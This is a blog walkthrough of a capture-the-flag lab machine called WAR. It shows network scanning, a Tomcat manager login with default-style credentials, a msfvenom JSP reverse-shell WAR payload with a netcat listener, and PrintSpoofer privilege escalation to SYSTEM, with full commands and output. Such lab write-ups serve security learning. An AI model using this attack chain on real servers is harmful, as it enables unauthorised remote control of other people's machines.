WAR

WAR


I successfully identified several devices on your local network, including the target machine at 192.168.88.11 with the MAC address 08:00:27:be:6e:1d. This is the crucial first step in identifying your target you can see below.

┌──(kali㉿kali)-[~]
└─$ sudo arp-scan -I eth0 --localnet
[sudo] password for kali: 
Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.7
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.5    00:e0:4c:69:66:4a       REALTEK SEMICONDUCTOR CORP.
192.168.88.1    d8:44:89:50:2d:a3       (Unknown)
192.168.88.6    00:d8:61:fa:c0:4a       Micro-Star INTL CO., LTD.
192.168.88.11   08:00:27:be:6e:1d       PCS Systemtechnik GmbH

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.260 seconds (113.27 hosts/sec). 4 responded

The successful ping responses confirmed that your Kali machine could communicate with the target machine at 192.168.88.11. This ensures the target is alive and responsive on the network you can see below.
                                                                                                         
┌──(kali㉿kali)-[~]
└─$ ping 192.168.88.11 
PING 192.168.88.11 (192.168.88.11) 56(84) bytes of data.
64 bytes from 192.168.88.11: icmp_seq=1 ttl=128 time=1.55 ms
64 bytes from 192.168.88.11: icmp_seq=2 ttl=128 time=0.854 ms
^C
--- 192.168.88.11 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1022ms
rtt min/avg/max/mdev = 0.854/1.201/1.549/0.347 ms

First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command:
  • nmap -n -Pn -sV -vvv --open --min-rate 5000 -sC 192.168.88.11
The scripts also provided additional details like the hostname (WAR), the workgroup (WORKGROUP), the MAC address, and the operating system (Windows). The discovery of the Tomcat web server on port 8080 was a key finding for your next steps.

This revealed several open TCP ports with associated services, including:
  • HTTP (8080)
  • Kerberos (88)
  • RPC (135)
  • NetBIOS-SSN (139)
  • SMB (445)
  • RDP (3389
┌──(root💀kali)-[/home/kali/Downloads]
└─# nmap -n -Pn -sV -vvv --open --min-rate 5000 -sC 192.168.88.11
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-01 18:00 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
Initiating ARP Ping Scan at 18:00
Scanning 192.168.88.11 [1 port]
Completed ARP Ping Scan at 18:00, 0.10s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 18:00
Scanning 192.168.88.11 [1000 ports]
Discovered open port 8080/tcp on 192.168.88.11
Discovered open port 139/tcp on 192.168.88.11
Discovered open port 135/tcp on 192.168.88.11
Discovered open port 445/tcp on 192.168.88.11
Completed SYN Stealth Scan at 18:00, 0.88s elapsed (1000 total ports)
Initiating Service scan at 18:00
Scanning 4 services on 192.168.88.11
Completed Service scan at 18:00, 8.64s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.88.11.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 5.33s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.06s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.01s elapsed
Nmap scan report for 192.168.88.11
Host is up, received arp-response (0.00042s latency).
Scanned at 2025-05-01 18:00:05 CEST for 15s
Not shown: 654 closed tcp ports (reset), 342 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE       REASON          VERSION
135/tcp  open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds? syn-ack ttl 128
8080/tcp open  http          syn-ack ttl 128 Apache Tomcat (language: en)
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/11.0.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
MAC Address: 08:00:27:BE:6E:1D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 41295/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 57669/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 26441/udp): CLEAN (Timeout)
|   Check 4 (port 60222/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-05-02T02:00:14
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: 9h59m58s
| nbstat: NetBIOS name: WAR, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:be:6e:1d (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   WAR<00>              Flags: <unique><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WAR<20>              Flags: <unique><active>
| Statistics:
|   08:00:27:be:6e:1d:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:00
Completed NSE at 18:00, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.87 seconds
           Raw packets sent: 1543 (67.876KB) | Rcvd: 659 (26.364KB)

Port and Service Enumeration: nmap revealed several open TCP ports on the target: 

  1. 135 (msrpc)
  2. 139 (netbios-ssn) 
  3. 445 (microsoft-ds)
  4. 8080 (http) running Apache Tomcat
The presence of SMB ports (139, 445) and a Tomcat web server (8080) are points of interest for potential vulnerabilities.

Also, I observed that an entry 192.168.88.11 WAR existed in the /etc/hosts file. This file maps hostnames to IP addresses. By adding this entry, you could potentially refer to the target machine as WAR instead of its IP address in subsequent commands you can see below.

┌──(root💀kali)-[/home/kali/Downloads]
└─# nano /etc/hosts
┌──(root💀kali)-[/home/kali/Downloads]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
192.168.88.11   WAR
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

smbmap attempted to connect to the SMB service on the target anonymously. It detected the SMB service but encountered an error ("Error occurs while reading from remote(104)"). This often indicates that anonymous access is not allowed or there might be a network issue you can see below.

┌──(root💀kali)-[/home/kali/Downloads]
└─# smbmap -u "" -p "" -H 192.168.88.11

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...                                                                                 [*] Detected 1 hosts serving SMB
[|] Authenticating...                                                                                          [/] Authenticating...                                                                                          [*] Established 1 SMB connections(s) and 0 authenticated session(s)
[-] Authenticating...                                                                                          [!] Something weird happened on (192.168.88.11) Error occurs while reading from remote(104) on line 1015
[\] Closing connections..                                                                                      [|] Closing connections..                                                                                      [/] Closing connections..                                                                                      [-] Closing connections..                                                                                      [*] Closed 1 connections

netexec has confirmed the Windows version and hostname (WAR) and indicated that SMB signing was not required. However, it also returned an error (STATUS_INVALID_PARAMETER) when trying to establish a session anonymously, reinforcing the likelihood that anonymous SMB access was restricted you can see below.

┌──(root💀kali)-[/home/kali/Downloads]
└─# netexec smb 192.168.88.11 -u '' -p ''        
SMB         192.168.88.11   445    WAR              [*] Windows 10 / Server 2019 Build 19041 x64 (name:WAR) (domain:WAR) (signing:False) (SMBv1:False)
SMB         192.168.88.11   445    WAR              [-] WAR\: STATUS_INVALID_PARAMETER

┌──(root💀kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://192.168.88.11:8080/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,bak
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.88.11:8080/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 302) [Size: 0] [--> /docs/]
/examples             (Status: 302) [Size: 0] [--> /examples/]
/manager              (Status: 302) [Size: 0] [--> /manager/]

We can see that gobuster found several interesting directories which are:
  • /docs/ (Status: 302 - Redirect)

  • /examples/ (Status: 302 - Redirect)

  • /manager/ (Status: 302 - Redirect)

  • /RELEASE-NOTES.txt (Status: 200 - OK)

Now, we have to go to Google and paste the IP Address with port and we will discover this webpage which you can see in the picture below (http://192.168.88.11:8080/).



Let's go to try username and password such as username: tomcat and password: tomcat  but login is denied as you can see in the picture below.


Let's go to try username and password such as username: admin and password: tomcat   and login is correct as you can see in the picture below.



Now we have discovered a option which is manager where below we have to upload an file with war extension.



As I unknowledge this extension let's go to find out in Google and we have got this file which is java extension, for it we must create reverse shell with war extension.




Now we have to confirm my Kali machine's IP address (192.168.88.7) on the eth0 interface. 
This was important for setting up the reverse shell later.

┌──(kali㉿kali)-[~]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:43:73:bc brd ff:ff:ff:ff:ff:ff
    inet 192.168.88.7/24 brd 192.168.88.255 scope global dynamic noprefixroute eth0
       valid_lft 5828sec preferred_lft 5828sec
    inet6 fd00::965d:fb43:2d56:ead9/64 scope global temporary dynamic 
       valid_lft 27sec preferred_lft 27sec
    inet6 fd00::a00:27ff:fe43:73bc/64 scope global dynamic mngtmpaddr noprefixroute 
       valid_lft 27sec preferred_lft 27sec
    inet6 fe80::a00:27ff:fe43:73bc/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:3b:1c:3f:a6 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever

Now, we have to make a reverse shell and we will try obtain with the command.
I successfully generated a shell.war file containing the JSP reverse TCP shell.
                                                                                                                              
┌──(kali㉿kali)-[~]

└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.88.7 LPORT=4444 -f war -o shell.war
Payload size: 1088 bytes
Final size of war file: 1088 bytes
Saved as: shell.war

In addition, we must upload java file with war extension which have made before as you can see in both pictures below.





Now ,when we execute this file we will be able to obtain reverse shell in our attacker machine.
For it, we need open listener in the same port which have created before with msfvenom as you can see below.




┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.88.7] from (UNKNOWN) [192.168.88.11] 51973
Microsoft Windows [Version 10.0.19045.2965]
(c) Microsoft Corporation. All rights reserved.


Once the shell.war file was successfully deployed on the Tomcat server, 
accessing it (likely through a specific URL like /shell/) triggered the execution of the JSP. 
Then, the target machine connected back to listener giving  a command shell on the target. 

C:\Program Files\Apache Software Foundation\Tomcat 11.0>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 380E-880B

 Directory of C:\Program Files\Apache Software Foundation\Tomcat 11.0

12/06/2024  02:58 PM    <DIR>          .
12/06/2024  02:58 PM    <DIR>          ..
12/06/2024  02:58 PM    <DIR>          bin
12/06/2024  02:58 PM    <DIR>          conf
12/06/2024  02:58 PM    <DIR>          lib
11/06/2024  12:08 PM            61,666 LICENSE
05/01/2025  07:14 PM    <DIR>          logs
11/06/2024  12:08 PM             2,401 NOTICE
11/06/2024  12:08 PM             6,631 RELEASE-NOTES
12/06/2024  02:58 PM    <DIR>          temp
11/06/2024  12:08 PM            21,630 tomcat.ico
11/06/2024  12:08 PM            85,632 Uninstall.exe
05/01/2025  07:23 PM    <DIR>          webapps
12/06/2024  02:58 PM    <DIR>          work
               5 File(s)        177,960 bytes
               9 Dir(s)  32,189,415,424 bytes free

C:\Program Files\Apache Software Foundation\Tomcat 11.0>


Now, we have to confirm we are in the Tomcat installation directory and identified the privileges of the Tomcat service user. The presence of the SeImpersonatePrivilege is a critical finding, indicating a potential privilege escalation path which permit to me escalate privileges as If I were system32, for it we must execute the whoami /priv command you can see below.

C:\Program Files\Apache Software Foundation\Tomcat 11.0>whoami /priv
whoami /priv                                                                                                                  
                                                                                                                              
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeSystemtimePrivilege         Change the system time                    Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege     Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled


Now we have to download the PrintSpoofer64.exe exploit, which is known to leverage the SeImpersonatePrivilege to gain SYSTEM-level access as you can see below.

┌──(kali㉿kali)-[~]
└─$ wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
--2025-05-01 18:33:26--  https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
Resolving github.com (github.com)... 140.82.121.4
Connecting to github.com (github.com)|140.82.121.4|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/259576481/816ce080-f39e-11ea-8fc2-8afb7b4f4821?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250501T163327Z&X-Amz-Expires=300&X-Amz-Signature=731fc5e8b919863fd643ff9001e91207ae97db2adc8a8c287dc89e16edbbe8aa&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DPrintSpoofer64.exe&response-content-type=application%2Foctet-stream [following]
--2025-05-01 18:33:27--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/259576481/816ce080-f39e-11ea-8fc2-8afb7b4f4821?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250501T163327Z&X-Amz-Expires=300&X-Amz-Signature=731fc5e8b919863fd643ff9001e91207ae97db2adc8a8c287dc89e16edbbe8aa&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DPrintSpoofer64.exe&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.110.133, 185.199.109.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27136 (26K) [application/octet-stream]
Saving to: ‘PrintSpoofer64.exe’

PrintSpoofer64.exe   100%[====================>]  26.50K  --.-KB/s    in 0.02s   

2025-05-01 18:33:28 (1.08 MB/s) - ‘PrintSpoofer64.exe’ saved [27136/27136]

Now, we set up a temporary SMB server on our Kali machine, making the files in your current directory accessible to the target machine with this command which is below.

┌──(kali㉿kali)-[~]
└─$ sudo impacket-smbserver reverse_shell $(pwd) -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (192.168.88.11,51978)
[*] AUTHENTICATE_MESSAGE (\,WAR)
[*] User WAR\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:reverse_shell)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:reverse_shell)
[*] Closing down connection (192.168.88.11,51978)
[*] Remaining connections []

In addition, PrintSpoofer64.exe file was successfully copied to the Tomcat installation directory on the target with this command which is below.

C:\Program Files\Apache Software Foundation\Tomcat 11.0>copy \\192.168.88.7\reverse_shell\PrintSpoofer64.exe PrintSpoofer64.exe
copy \\192.168.88.7\reverse_shell\PrintSpoofer64.exe PrintSpoofer64.exe
        1 file(s) copied.

But as we want to verify the file we have to execute this  command:
  • dir( to listing files or programs which are in the machine)

C:\Program Files\Apache Software Foundation\Tomcat 11.0>dir      
dir
 Volume in drive C has no label.
 Volume Serial Number is 380E-880B

 Directory of C:\Program Files\Apache Software Foundation\Tomcat 11.0

05/01/2025  07:42 PM    <DIR>          .
05/01/2025  07:42 PM    <DIR>          ..
12/06/2024  02:58 PM    <DIR>          bin
12/06/2024  02:58 PM    <DIR>          conf
12/06/2024  02:58 PM    <DIR>          lib
11/06/2024  12:08 PM            61,666 LICENSE
05/01/2025  07:14 PM    <DIR>          logs
11/06/2024  12:08 PM             2,401 NOTICE
12/07/2021  05:57 AM            27,136 PrintSpoofer64.exe
11/06/2024  12:08 PM             6,631 RELEASE-NOTES
12/06/2024  02:58 PM    <DIR>          temp
11/06/2024  12:08 PM            21,630 tomcat.ico
11/06/2024  12:08 PM            85,632 Uninstall.exe
05/01/2025  07:23 PM    <DIR>          webapps
12/06/2024  02:58 PM    <DIR>          work
               6 File(s)        205,096 bytes
               9 Dir(s)  32,155,258,880 bytes free

But as we have installed PrintSpoofer64.exe we need to know how execute and we have to execute the -h param to see the different options.

C:\Program Files\Apache Software Foundation\Tomcat 11.0>PrintSpoofer64.exe -h
PrintSpoofer64.exe -h

PrintSpoofer v0.1 (by @itm4n)

  Provided that the current user has the SeImpersonate privilege, this tool will leverage the Print
  Spooler service to get a SYSTEM token and then run a custom command with CreateProcessAsUser()

Arguments:
  -c <CMD>    Execute the command *CMD*
  -i          Interact with the new process in the current command prompt (default is non-interactive)
  -d <ID>     Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
  -h          That's me :)

Examples:
  - Run PowerShell as SYSTEM in the current console
      PrintSpoofer.exe -i -c powershell.exe
  - Spawn a SYSTEM command prompt on the desktop of the session 1
      PrintSpoofer.exe -d 1 -c cmd.exe
  - Get a SYSTEM reverse shell
      PrintSpoofer.exe -c "c:\Temp\nc.exe 10.10.13.37 1337 -e cmd"

For it, as we can see there are these options:

Arguments:
  -c <CMD>    Execute the command *CMD*
  -i          Interact with the new process in the current command prompt (default is non-interactive)
  -d <ID>     Spawn a new process on the desktop corresponding to this session *ID* (check your ID with qwinsta)
  -h          That's me :)


And we must use this command:
  • PrintSpoofer64.exe -i -c powershell as you see below
C:\Program Files\Apache Software Foundation\Tomcat 11.0>PrintSpoofer64.exe -i -c powershell 
PrintSpoofer64.exe -i -c powershell 
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

The exploit successfully leveraged the SeImpersonatePrivilege to spawn a new PowerShell process running as nt authority\system, achieving privilege escalation to the highest level on the Windows machine.


Now for finish this machine we have to find out both flags which are user flag and root flag that normally is hiding in this paths:
  • C:\Users\user\user.txt
  • C:\Users\user\root.txt
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32>
PS C:\Windows\system32> cd C:\Users\
cd C:\Users\
PS C:\Users> dir
dir


    Directory: C:\Users


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         12/6/2024   1:21 PM                Administrator                                                        
d-----         12/6/2024   4:00 AM                low                                                                  
d-r---         12/6/2024   3:58 AM  

PS C:\Users> cd low
cd low
PS C:\Users\low> dir
dir


    Directory: C:\Users\low


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-r---         12/6/2024   3:58 AM                3D Objects                                                           
d-r---         12/6/2024   3:58 AM                Contacts                                                             
d-r---         12/6/2024   4:33 PM                Desktop                                                              
d-r---         12/6/2024   3:58 AM                Documents                                                            
d-r---         12/6/2024   3:58 AM                Downloads                                                            
d-r---         12/6/2024   3:58 AM                Favorites                                                            
d-r---         12/6/2024   3:58 AM                Links                                                                
d-r---         12/6/2024   3:58 AM                Music                                                                
d-r---         12/6/2024   4:00 AM                OneDrive                                                             
d-r---         12/6/2024   4:00 AM                Pictures                                                             
d-r---         12/6/2024   3:58 AM                Saved Games                                                          
d-r---         12/6/2024   3:59 AM                Searches                                                             
d-r---         12/6/2024   3:58 AM                Videos                                                               


PS C:\Users\low> cd Desktop
cd Desktop
PS C:\Users\low\Desktop> dir
dir


    Directory: C:\Users\low\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         12/6/2024   4:23 PM             35 user.txt                                                             


We have just discovered the first user flag which is located in this path and if we want to see should execute  Get-Command + file.txt (Get-Content user.txt).
  • C:\Users\low\Desktop>

PS C:\Users\low\Desktop> Get-Content user.txt
Get-Content user.txt
3a1ddb915bd423f0ca428dce35612dcb 
PS C:\Users\low\Desktop> 
PS C:\Users\low> cd ..
cd ..
PS C:\Users> dir
dir


    Directory: C:\Users


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         12/6/2024   1:21 PM                Administrator                                                        
d-----         12/6/2024   4:00 AM                low                                                                  
d-r---         12/6/2024   3:58 AM                Public

PS C:\Windows\system32> cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop
PS C:\Users\Administrator\Desktop> dir
dir


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         12/6/2024   4:30 PM             35 root.txt                                                             


We have just discovered the second root flag which is located in this path and if we want to see should execute  Get-Command + file.txt (Get-Content root.txt).
  • C:\Users\Administrator\Desktop

PS C:\Users\Administrator\Desktop> Get-Content root.txt
Get-Content root.txt
1399d5ba705df14146335def4ff64520

Thank you very much for reading this article

I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

INTERNAL

Image
 INTERNAL(TRYHACKME) First of all, let's go execute nmap command to identify alives ports and version with this host 192.168.88.6 as you can see below. Key open ports and services include: Web Servers: Port 80 (HTTP):  Running  Apache2 Ubuntu Default Page . It supports  OPTIONS ,  TRACE  (flagged as potentially risky),  GET ,  HEAD , and  POST  methods. The webpage title is " INTERNAL ". SSH Protocol Port 22 (SSH): Running Linux . ┌──(root㉿kali)-[/home/luis/Descargas] └─# nmap -n -Pn -p- --min-rate 5000 -sC 10.10.216.78 -vvv Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 12:06 CEST NSE: Loaded 126 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 12:06 Completed NSE at 12:06, 0.00s elapsed Initiating SYN Stealth Scan at 12:06 Scanning 10.10.216.78 [65535 ports] Discove...
Read more »

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
